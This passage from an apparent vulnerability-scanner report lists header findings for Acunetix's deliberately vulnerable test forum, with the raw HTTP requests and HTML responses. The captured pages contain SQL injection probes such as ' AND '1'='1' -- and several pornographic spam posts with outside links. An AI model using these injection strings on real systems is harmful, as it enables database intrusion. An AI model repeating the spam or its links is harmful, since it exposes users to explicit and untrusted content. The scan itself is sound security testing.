src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4440 |
| Response Body - size: 4,440 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4502 |
| Response Body - size: 4,502 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4533 |
| Response Body - size: 4,533 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4422 |
| Response Body - size: 4,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4471 |
| Response Body - size: 4,471 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" 